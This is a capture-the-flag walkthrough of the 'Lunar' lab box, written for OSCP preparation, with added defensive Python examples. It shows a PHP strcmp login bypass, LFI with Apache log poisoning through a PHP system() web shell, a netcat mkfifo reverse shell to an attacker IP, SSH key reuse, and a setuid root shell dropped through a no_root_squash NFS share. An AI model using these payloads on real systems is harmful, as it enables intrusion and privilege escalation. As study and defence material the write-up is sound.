Proving Grounds: Lunar
Today we will take a look at Proving Grounds: Lunar. My purpose in sharing this post is to prepare for the OSCP exam. It is also to show you the way if you get stuck. Please try to understand each step and take notes.
- Network
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c1994b952225ed0f8520d363b448bbcf (RSA)
| 256 0f448badad95b8226af036ac19d00ef3 (ECDSA)
|_ 256 32e12a6ccc7ce63e23f4808d33ce9b3a (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Lunar Studio
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 3 2049/udp nfs
| 100003 3,4 2049/tcp nfs
| 100005 1,2,3 52125/tcp mountd
| 100005 1,2,3 60293/udp mountd
| 100021 1,3,4 44323/tcp nlockmgr
| 100021 1,3,4 59142/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/udp nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
40609/tcp open rpcbind
44323/tcp open nlockmgr 1-4 (RPC #100021)
52125/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- 80 (apache)
Scanning with Nikto, we find the backup.zip file:
└─$ nikto -h http://192.168.60.216
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.60.216
+ Target Hostname: 192.168.60.216
+ Target Port: 80
+ Start Time: 2023-01-20 10:57:10 (GMT4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Server may leak inodes via ETags, header found with file /, inode: 49b7, size: 5ddbc015cc380, mtime: gzip
+ /backup.zip: Potentially interesting archive/cert file found.
You can also find it with Feroxbuster:
200 GET 0l 0w 1265712c http://192.168.60.216/backup.zip
Login.php
We see the source code of login.php extracted from backup.zip. From here we get the email address, and next to the password we see the strcmp function:
if ($_POST['email'] && !empty($_POST['email']) && $_POST['email'] === 'liam@lunar.local' && strcmp($_POST['password'], $pwd) == 0) {
The loose `== 0` comparison is the weak point: strcmp() returns NULL when it is not given a string, and NULL == 0 is true under PHP's loose comparison (a strict `===` check on a string-typed value, or password_verify(), would not have this problem). We bypass it and enter dashboard.php.
Dashboard.php
Here we see that we can read files through the ext parameter:
function containsStr($str, $substr) {
    return strpos($str, $substr) !== false;
}
// user-controlled extension, appended to the include path unchanged
$ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
if(isset($_GET['show'])) {
    // substring check only: any value that contains 'pending' or 'completed' passes
    if(containsStr($_GET['show'], 'pending') || containsStr($_GET['show'], 'completed')) {
        error_reporting(E_ALL ^ E_WARNING);
        include $_GET['show'] . $ext;
    } else {
        echo 'You can select either one of these only';
    }
}
Check the /etc/passwd file with the LFI:
$url/dashboard.php?show=completed&ext=../../../../../etc/passwd
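To make clear why the substring check does not stop the traversal, here is the include logic of dashboard.php re-expressed in Python next to a hardened resolver. This is an added example, not code from the Lunar box; WEB_ROOT and the two view filenames in ALLOWED_VIEWS are assumptions.

```python
"""Path resolution behind dashboard.php's `include $_GET['show'] . $ext`.

Added example, not code from the Lunar box: the vulnerable include logic
mirrored in Python beside a hardened resolver, so both can be tested.
"""
import posixpath
from typing import Optional

WEB_ROOT = "/var/www/html"   # assumed document root (constructed value)
# Allowlisted views; the real filenames on the box are not known, these are assumed.
ALLOWED_VIEWS = {"pending": "pending.php", "completed": "completed.php"}


def contains_str(s: str, sub: str) -> bool:
    """PHP containsStr(): strpos($str, $substr) !== false."""
    return sub in s


def resolve_vulnerable(show: str, ext: str = ".php") -> Optional[str]:
    """Mirror of dashboard.php: a substring check on `show`, then the include
    of `show . ext` relative to the web root. The write-up shows
    `completed../../../../../etc/passwd` opening /etc/passwd, i.e. the `..`
    segments are collapsed lexically, which posixpath.normpath models."""
    if not (contains_str(show, "pending") or contains_str(show, "completed")):
        return None
    return posixpath.normpath(posixpath.join(WEB_ROOT, show + ext))


def resolve_hardened(show: str, ext: Optional[str] = None) -> Optional[str]:
    """Exact-match allowlist; the caller's `ext` is accepted for API
    compatibility but ignored entirely; the final path must still sit
    under WEB_ROOT as defence in depth."""
    target = ALLOWED_VIEWS.get(show)
    if target is None:
        return None
    full = posixpath.normpath(posixpath.join(WEB_ROOT, target))
    if posixpath.commonpath([WEB_ROOT, full]) != WEB_ROOT:
        return None
    return full


if __name__ == "__main__":
    probe = ("completed", "../../../../../etc/passwd")
    print("vulnerable ->", resolve_vulnerable(*probe))   # /etc/passwd
    print("hardened   ->", resolve_hardened(*probe))     # /var/www/html/completed.php
```

The hardened version never builds a path from request data at all: the request selects a key, the server owns the filename, and the containment check only exists to catch a future mistake in the allowlist.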
Check the access.log file for log poisoning:
URL/dashboard.php?show=completed&ext=../../../../../var/log/apache2/access.log
Now let's write the poison into the log; it will run whatever is passed in the cmd parameter:
└─$ nc 192.168.60.216 80
GET /<?php system($_GET['cmd']); ?>
RCE
Payload
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
Don't forget to URL-encode it (the encoded request below points at the attacking host 192.168.49.60 on port 443 rather than the placeholder 10.0.0.1:4242):
URL/dashboard.php?show=completed&ext=../../../../../var/log/apache2/access.log&cmd=rm%20-f%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20192.168.49.60%20443%20%3E%2Ftmp%2Ff
Reverse shell, and we have access as www-data.
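From the defender's side, both halves of this technique leave traces in the same access log that was poisoned. The following scanner is an added example (not part of the write-up) that runs over a few constructed combined-format log lines: one mirrors the raw request typed into nc above, another the URL-encoded dashboard.php request with the cmd parameter. The log lines, IPs and timestamps are constructed.

```python
"""Detect log-poisoning attempts in Apache access logs.

Added example, not from the Lunar write-up: scans combined-format lines for
PHP tags written into logged fields and for traversal-style parameters that
reach into log files, the two halves of the technique shown above.
"""
import re
from urllib.parse import unquote

# Constructed sample lines (not taken from the target).
SAMPLE_LOG = [
    '192.168.49.60 - - [20/Jan/2023:10:57:10 +0400] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '192.168.49.60 - - [20/Jan/2023:11:02:41 +0400] "GET /<?php system($_GET[\'cmd\']); ?>" 400 0 "-" "-"',
    '192.168.49.60 - - [20/Jan/2023:11:03:05 +0400] "GET /dashboard.php?show=completed&ext=..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fapache2%2Faccess.log&cmd=id HTTP/1.1" 200 2201 "-" "curl/7.88.1"',
    '10.10.10.5 - - [20/Jan/2023:11:05:00 +0400] "GET /dashboard.php?show=completed HTTP/1.1" 200 431 "-" "Mozilla/5.0"',
]

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) \S+'
)
PHP_TAG = re.compile(r'<\?(php\b|=)', re.IGNORECASE)      # code written into the log
TRAVERSAL = re.compile(r'(?:\.\./){2,}')                   # ../ sequences in a parameter
LOG_PATH = re.compile(r'/var/log/|(?:access|error|auth)\.log', re.IGNORECASE)
CMD_PARAM = re.compile(r'[?&](?:cmd|exec|command)=', re.IGNORECASE)


def classify(line):
    """Return the list of indicators found in one log line (empty if clean)."""
    m = LINE_RE.match(line)
    if not m:
        return ["unparseable"]
    # Decode once so %2F, %3C and friends cannot hide the payload. The whole
    # line is checked for PHP tags because every logged field (request,
    # referer, user agent) ends up in the same file.
    decoded = unquote(line)
    request = unquote(m.group("request"))
    tags = []
    if PHP_TAG.search(decoded):
        tags.append("php-tag")
    if TRAVERSAL.search(request):
        tags.append("traversal")
        if LOG_PATH.search(request):
            tags.append("log-inclusion")   # traversal aimed at a log file
        if CMD_PARAM.search(request):
            tags.append("cmd-param")       # trigger parameter sent alongside it
    return tags


def scan(lines):
    """Return a finding dict for every suspicious line, in log order."""
    findings = []
    for line in lines:
        tags = classify(line)
        if tags:
            m = LINE_RE.match(line)
            findings.append({
                "ip": m.group("ip") if m else None,
                "status": int(m.group("status")) if m else None,
                "tags": tags,
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The 400 response on the poisoned line is worth keeping in the alert: Apache rejects the malformed request but still logs the request line, which is exactly what makes the technique work, so a rejected request is not a clean request.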
- liam
Linpeas?
We find liam's id_rsa file; save it and log in:
└─$ vim liam
└─$ chmod 600 liam
└─$ ssh liam@192.168.60.216 -i liam
$ script /dev/null -c bash
Script started, file is /dev/null
- Privesc (no_root_squash)
Here we see that the NFS share is exported only to localhost. Since liam can write to /etc/hosts, we add our attacking IP under the name localhost so the server resolves our address to that name:
liam@lunar:~$ echo "192.168.49.60 localhost" >> /etc/hosts
liam@lunar:~$ cat /etc/hosts
127.0.0.1 localhost
127.0.0.1 lunar
192.168.49.60 localhost
Preparing our payload and sending it in via the share:
└─$ mkdir tmp
┌──(kali㉿kali)-[~/OSCP/lab/nfs]
└─$ sudo mount -t nfs 192.168.60.216:/srv/share tmp -o nolock
[sudo] password for kali:
┌──(kali㉿kali)-[~/OSCP/lab/nfs]
└─$ ls
tmp
┌──(kali㉿kali)-[~/OSCP/lab/nfs]
└─$ cd tmp
┌──(kali㉿kali)-[~/OSCP/lab/nfs/tmp]
└─$ ls
┌──(kali㉿kali)-[~/OSCP/lab/nfs/tmp]
└─$ cat > shell.c<<EOF
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), setgid() */
int main(){
    /* the file is created as root through the no_root_squash export and
       given the setuid bit, so these calls succeed when liam runs it */
    setuid(0);
    setgid(0);
    system("/bin/bash");
}
EOF
┌──(kali㉿kali)-[~/OSCP/lab/nfs/tmp]
└─$ sudo gcc -static shell.c -o shell
┌──(kali㉿kali)-[~/OSCP/lab/nfs/tmp]
└─$ sudo chmod u+s shell
Run the shell:
liam@lunar:~$ cd /srv
liam@lunar:/srv$ cd share
liam@lunar:/srv/share$ ls
shell shell.c
liam@lunar:/srv/share$ ./shell
root@lunar:/srv/share# whoami
root
root@lunar:/srv/share#
And now we are root.
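Two things made this privesc possible: no_root_squash on the export, and a host restriction ("localhost") that is enforced by name resolution, which a writable /etc/hosts on the server defeats. Here is an added example (not tooling from the write-up) that audits an /etc/exports file for both and scans a share for setuid files like the one dropped above. The exports text is constructed; its first line reproduces the configuration the privesc needs.

```python
"""Audit NFS exports for the no_root_squash weakness used above and look for
setuid binaries dropped into a share.

Added example, not tooling from the Lunar write-up. SAMPLE_EXPORTS is a
constructed file, not the box's real /etc/exports.
"""
import os
import stat
import tempfile

SAMPLE_EXPORTS = """\
# constructed /etc/exports (not the box's real file)
/srv/share   localhost(rw,sync,no_root_squash,no_subtree_check)
/srv/public  192.168.60.0/24(ro,sync,root_squash,no_subtree_check)
/srv/open    *(rw,sync,no_subtree_check)
"""


def parse_exports(text):
    """Return (path, client, options) for every client spec in /etc/exports."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        path, specs = parts[0], parts[1:] or ["*"]   # no client spec means everyone
        for spec in specs:
            client, _, opts = spec.partition("(")
            options = [o for o in opts.rstrip(")").split(",") if o]
            exports.append((path, client or "*", options))
    return exports


def looks_like_address(client):
    """IPs and CIDRs are matched numerically; names go through reverse DNS and /etc/hosts."""
    return client[0].isdigit() or ":" in client


def audit_exports(text):
    """Return one human-readable finding per weakness per export."""
    findings = []
    for path, client, options in parse_exports(text):
        if "no_root_squash" in options:
            findings.append(f"{path} {client}: no_root_squash lets a root user on the "
                            "client create root-owned setuid files on the server")
        if client == "*":
            findings.append(f"{path}: exported to every host")
        elif not looks_like_address(client):
            findings.append(f"{path} {client}: hostname restriction depends on name "
                            "resolution; a writable /etc/hosts on the server defeats it")
        if "insecure" in options:
            findings.append(f"{path} {client}: insecure accepts requests from client ports above 1024")
    return findings


def find_setuid(root):
    """Walk `root` and return regular files with the setuid bit set (sorted)."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(full)
    return sorted(hits)


def demo_setuid_scan():
    """Build a throwaway share with one setuid file and report what the scan finds."""
    with tempfile.TemporaryDirectory() as share:
        for name, mode in (("shell", 0o4755), ("shell.c", 0o644)):
            path = os.path.join(share, name)
            with open(path, "w") as fh:
                fh.write("placeholder\n")   # constructed content, not a real binary
            os.chmod(path, mode)
        return [os.path.basename(p) for p in find_setuid(share)]


if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print(finding)
    print("setuid files found:", demo_setuid_scan())
```

The fix for the export line is to drop no_root_squash (root_squash is the default) and to restrict clients by address or CIDR rather than by name; the setuid scan is the kind of check that belongs in a cron job or an auditd watch on the exported directory.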
"If you have any questions or comments, please do not hesitate to write. Have a good day."